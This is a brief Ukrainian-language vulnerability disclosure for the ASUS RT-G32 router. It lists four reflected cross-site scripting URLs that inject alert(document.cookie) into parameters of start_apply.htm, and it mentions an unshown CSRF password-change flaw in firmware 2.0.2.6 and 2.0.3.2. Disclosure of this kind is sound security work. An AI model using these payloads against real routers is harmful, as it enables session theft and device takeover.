Уразливості в ASUS RT-G32
23:58 28.02.2015У січні, 28.01.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-G32. Це перша частина дірок в RT-G32.
Раніше я писав про уразливості в Asus O!Play.
Cross-Site Scripting (WASC-08):
http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
Дані уразливості працюють як через GET, так і через POST.
Cross-Site Request Forgery (WASC-09):
Зміна паролю пристрою:
Уразливі всі версії ASUS RT-G32. Перевірялося в ASUS RT-G32 з прошивками версій 2.0.2.6 і 2.0.3.2.